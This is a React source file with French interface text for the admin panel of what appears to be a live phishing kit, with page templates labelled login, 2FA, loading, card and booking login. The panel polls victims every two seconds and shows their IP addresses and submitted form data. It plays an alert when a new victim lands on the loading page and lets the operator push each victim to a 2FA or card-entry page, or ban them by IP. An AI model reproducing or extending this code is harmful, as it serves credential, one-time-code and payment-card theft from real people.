import React, { useState, useEffect } from 'react';
import { BrowserRouter as Router, Routes, Route, Navigate } from 'react-router-dom';
import axios from 'axios';
import './App.css';

// Mapping UID -> nom lisible pour les templates
const TEMPLATE_LABELS = {
  '49cddf11-b7cb-494b-login-0ff1b5d45c9a': 'login',
  '49cddf11-b7cb-494b-2fa-0ff1b5d45c9a': '2FA',
  '49cddf11-b7cb-494b-load-0ff1b5d45c9a': 'loading',
  '49cddf11-b7cb-494b-cc-0ff1b5d45c9a': 'card',
  '49cddf11-b7cb-494b-b1-0ff1b5d45c9a': 'booking_login',
  '49cddf11-b7cb-494b-2fa-b2-0ff1b5d45c9a': 'booking_2fa',
};

const BACKEND_URL = window.location.origin;

const API = `${BACKEND_URL}/auth`;

// Admin Dashboard Component
const AdminDashboard = () => {
  const [users, setUsers] = useState([]);
  const [templates, setTemplates] = useState([]);
  const [loading, setLoading] = useState(true);
  const [selectedUser, setSelectedUser] = useState(null);
  const [adminPassword, setAdminPassword] = useState("");
  const [isAuthorized, setIsAuthorized] = useState(false);
  const [authError, setAuthError] = useState("");
  const [prevUserIds, setPrevUserIds] = useState([]);
  const notifAudio = React.useRef(null);

  // Débloquer l'audio au premier clic ou touche
  useEffect(() => {
    const unlockAudio = () => {
      if (notifAudio.current) {
        notifAudio.current.volume = 0;
        notifAudio.current.play().then(() => {
          notifAudio.current.pause();
          notifAudio.current.currentTime = 0;
          notifAudio.current.volume = 1;
        });
        window.removeEventListener('click', unlockAudio);
        window.removeEventListener('keydown', unlockAudio);
      }
    };
    window.addEventListener('click', unlockAudio);
    window.addEventListener('keydown', unlockAudio);
    return () => {
      window.removeEventListener('click', unlockAudio);
      window.removeEventListener('keydown', unlockAudio);
    };
  }, []);

  // Vérifie l'accès admin
  const checkAdmin = async (password) => {
    try {
      const response = await axios.get(`${API}/admin`, {
        headers: { 'X-Admin-Password': password }
      });
      if (response.status === 200) {
        setIsAuthorized(true);
        setAuthError("");
      }
    } catch (error) {
      setAuthError("Mot de passe incorrect");
      setIsAuthorized(false);
    }
  };

  // Fetch users data
  const fetchUsers = async () => {
    try {
      const response = await axios.get(`${API}/users`);
      setUsers(response.data.users);

      // Détection d'un nouvel utilisateur sur loading UNIQUEMENT
      const newUserIds = response.data.users.map(u => u.user_id);
      const newUsersOnLoading = response.data.users.filter(u => !prevUserIds.includes(u.user_id) && u.current_page === 'loading');
      if (newUsersOnLoading.length > 0 && notifAudio.current) {
        notifAudio.current.currentTime = 0;
        notifAudio.current.play();
      }
      setPrevUserIds(newUserIds);
    } catch (error) {
      console.error('Erreur lors de la récupération des utilisateurs:', error);
    }
  };

  // Fetch available templates
  const fetchTemplates = async () => {
    try {
      const response = await axios.get(`${API}/templates`);
      setTemplates(response.data.templates);
    } catch (error) {
      console.error('Erreur lors de la récupération des templates:', error);
    }
  };

  // Redirect user to specific page
  const redirectUser = async (userId, redirectTo) => {
    try {
      await axios.post(`${API}/user/redirect`, {
        user_id: userId,
        redirect_to: redirectTo
      });

    } catch (error) {
      console.error('Erreur lors de la redirection:', error);
      alert('Erreur lors de la redirection');
    }
  };

  // Remove user
  const removeUser = async (userId) => {
    if (window.confirm(`Êtes-vous sûr de vouloir supprimer l'utilisateur ${userId}?`)) {
      try {
        await axios.delete(`${API}/user/${userId}`);
        alert(`Utilisateur ${userId} supprimé`);
        fetchUsers(); // Refresh the list
      } catch (error) {
        console.error('Erreur lors de la suppression:', error);
        alert('Erreur lors de la suppression');
      }
    }
  };

  const banUser = async (userId) => {
    if (window.confirm(`Bannir l'utilisateur ${userId} (par IP) ?`)) {
      try {
        await axios.post(`${API}/ban/${userId}`);
        alert(`Utilisateur ${userId} banni (IP)`);
        fetchUsers();
      } catch (error) {
        alert('Erreur lors du bannissement');
      }
    }
  };

  // Format timestamp
  const formatTimestamp = (timestamp) => {
    return new Date(timestamp).toLocaleString('fr-FR');
  };

  // Initialize data on component mount
  useEffect(() => {
    if (isAuthorized) {
      const initializeData = async () => {
        await fetchUsers();
        await fetchTemplates();
        setLoading(false);
      };
      initializeData();
      const interval = setInterval(fetchUsers, 2000);
      return () => clearInterval(interval);
    }
  }, [isAuthorized]);

  if (!isAuthorized) {
    return (
      <div className="min-h-screen flex items-center justify-center bg-gray-100">
        <div className="bg-white p-8 rounded shadow-md w-full max-w-sm">
          <h2 className="text-xl font-bold mb-4">Accès Admin</h2>
          <input
            type="password"
            placeholder="Mot de passe admin"
            value={adminPassword}
            onChange={e => setAdminPassword(e.target.value)}
            className="w-full p-2 border rounded mb-2"
          />
          <button
            className="w-full bg-blue-600 text-white p-2 rounded"
            onClick={() => checkAdmin(adminPassword)}
          >
            Se connecter
          </button>
          {authError && <div className="text-red-500 mt-2">{authError}</div>}
        </div>
      </div>
    );
  }

  if (loading) {
    return (
      <div className="min-h-screen bg-gray-100 flex items-center justify-center">
        <div className="text-center">
          <div className="animate-spin rounded-full h-12 w-12 border-b-2 border-blue-500 mx-auto mb-4"></div>
          <p className="text-gray-600">Chargement du dashboard...</p>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-gray-100">
      <audio ref={notifAudio} src="/notif.mp3" preload="auto" />
      <div className="container mx-auto px-4 py-8">
        <h1 className="text-3xl font-bold text-gray-800 mb-8">Dashboard Admin</h1>
        
        {/* Stats Cards */}
        <div className="grid grid-cols-1 md:grid-cols-3 gap-6 mb-8">
          <div className="bg-white p-6 rounded-lg shadow-md">
            <h3 className="text-lg font-semibold text-gray-700 mb-2">Utilisateurs Connectés</h3>
            <p className="text-3xl font-bold text-blue-600">{users.length}</p>
          </div>
          <div className="bg-white p-6 rounded-lg shadow-md">
            <h3 className="text-lg font-semibold text-gray-700 mb-2">Templates Disponibles</h3>
            <p className="text-3xl font-bold text-green-600">{templates.length}</p>
          </div>
          <div className="bg-white p-6 rounded-lg shadow-md">
            <h3 className="text-lg font-semibold text-gray-700 mb-2">Données Reçues</h3>
            <p className="text-3xl font-bold text-purple-600">
              {users.reduce((sum, user) => sum + user.form_data.length, 0)}
            </p>
          </div>
        </div>

        {/* Users Table */}
        <div className="bg-white rounded-lg shadow-md overflow-hidden">
          <div className="px-6 py-4 border-b border-gray-200">
            <h2 className="text-xl font-semibold text-gray-800">Utilisateurs en Temps Réel</h2>
          </div>
          <div className="overflow-x-auto">
            <table className="w-full">
              <thead className="bg-gray-50">
                <tr>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    ID Utilisateur
                  </th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    Page Actuelle
                  </th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    Adresse IP
                  </th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    Dernière Activité
                  </th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    Données
                  </th>
                  <th className="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">
                    Actions
                  </th>
                </tr>
              </thead>
              <tbody className="bg-white divide-y divide-gray-200">
                {users.map((user) => (
                  <tr key={user.user_id} className="hover:bg-gray-50">
                    <td className="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">
                      {user.user_id.substring(0, 8)}...
                    </td>
                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-900">
                      <span className={`px-2 py-1 rounded-full text-xs font-medium ${
                        user.current_page === 'loading' ? 'bg-yellow-100 text-yellow-800' :
                        user.current_page === 'login' ? 'bg-blue-100 text-blue-800' :
                        user.current_page === '2fa' ? 'bg-purple-100 text-purple-800' :
                        user.current_page === 'card' ? 'bg-green-100 text-green-800' :
                        'bg-gray-100 text-gray-800'
                      }`}>
                        {user.current_page}
                      </span>
                    </td>
                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                      {user.metadata?.ip_address || 'N/A'}
                    </td>
                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                      {formatTimestamp(user.last_activity)}
                    </td>
                    <td className="px-6 py-4 whitespace-nowrap text-sm text-gray-500">
                      <button
                        onClick={() => setSelectedUser(user)}
                        className="text-blue-600 hover:text-blue-900"
                      >
                        Voir ({user.form_data.length})
                      </button>
                    </td>
                    <td className="px-6 py-4 whitespace-nowrap text-sm font-medium space-x-2">
                      <select
                        onChange={(e) => {
                          if (e.target.value) {
                            redirectUser(user.user_id, e.target.value);
                            e.target.value = '';
                          }
                        }}
                        className="border border-gray-300 rounded px-2 py-1 text-sm"
                      >
                        <option value="">Rediriger vers...</option>
                        {templates.map((template) => (
                          <option key={template} value={template}>
                            {TEMPLATE_LABELS[template] || template}
                          </option>
                        ))}
                      </select>
                      <button
                        onClick={() => removeUser(user.user_id)}
                        className="text-red-600 hover:text-red-900"
                      >
                        Supprimer
                      </button>
                      <button
                        onClick={() => banUser(user.user_id)}
                        className="text-yellow-600 hover:text-yellow-900 ml-2"
                      >
                        Bannir
                      </button>
                    </td>
                  </tr>
                ))}
              </tbody>
            </table>
          </div>
        </div>

        {/* User Data Modal */}
        {selectedUser && (
          <div className="fixed inset-0 bg-black bg-opacity-50 flex items-center justify-center z-50">
            <div className="bg-white rounded-lg p-6 max-w-2xl w-full mx-4 max-h-96 overflow-y-auto">
              <div className="flex justify-between items-center mb-4">
                <h3 className="text-lg font-semibold">
                  Données de l'utilisateur {selectedUser.user_id.substring(0, 8)}...
                </h3>
                <button
                  onClick={() => setSelectedUser(null)}
                  className="text-gray-400 hover:text-gray-600"
                >
                  ✕
                </button>
              </div>
              <div className="space-y-4">
                {selectedUser.form_data.length === 0 ? (
                  <p className="text-gray-500">Aucune donnée soumise</p>
                ) : (
                  selectedUser.form_data.map((entry, index) => (
                    <div key={index} className="border rounded p-3 bg-gray-50">
                      <div className="flex justify-between items-center mb-2">
                        <span className="font-medium text-sm text-gray-700">
                          Page: {entry.page}
                        </span>
                        <span className="text-xs text-gray-500">
                          {formatTimestamp(entry.timestamp)}
                        </span>
                      </div>
                      <pre className="text-sm text-gray-800 overflow-x-auto">
                        {JSON.stringify(entry.data, null, 2)}
                      </pre>
                    </div>
                  ))
                )}
              </div>
            </div>
          </div>
        )}
      </div>
    </div>
  );
};

// Main App Component
const App = () => {
  return (
    <Router>
      <Routes>
        <Route path="/admin" element={<AdminDashboard />} />
        <Route path="/" element={<Navigate to="/admin" />} />
      </Routes>
    </Router>
  );
};

export default App;